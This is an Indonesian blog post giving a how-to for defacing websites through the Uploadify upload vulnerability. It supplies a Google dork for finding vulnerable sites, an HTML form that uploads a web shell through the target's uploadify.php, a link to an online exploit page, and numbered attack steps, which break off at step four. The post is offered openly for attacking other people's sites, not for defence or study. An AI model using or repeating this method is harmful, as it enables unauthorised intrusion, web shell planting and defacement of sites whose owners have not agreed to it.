DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell
DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell Ini memang metode deface lama, tapi masih banyak kok yang pakai teknik ini :). Simak aja Tutorialnya Bahan-Bahan : PC/Laptop Koneksi Internet CSRF Dork Shell (kalo blm punya cari di gugel) Dork : inurl:/uploadify/ intitle:index of (bisa di kembangkan lagi) CSRF : <form method="post" action="urltarget"> enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="Filedata" ><br> <input type="submit" name="submit" value="Tusbol"> </form> Atau CSRF online di http://mouncyler-community.hol.es/expl/ lalu kalian pilih Filedata Tutorial : 1. Copy CSRF di atas lalu save dengan format .html 2. Dorking 3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank) 4. Edit CSRF yg tadi dah...








Komentar
Posting Komentar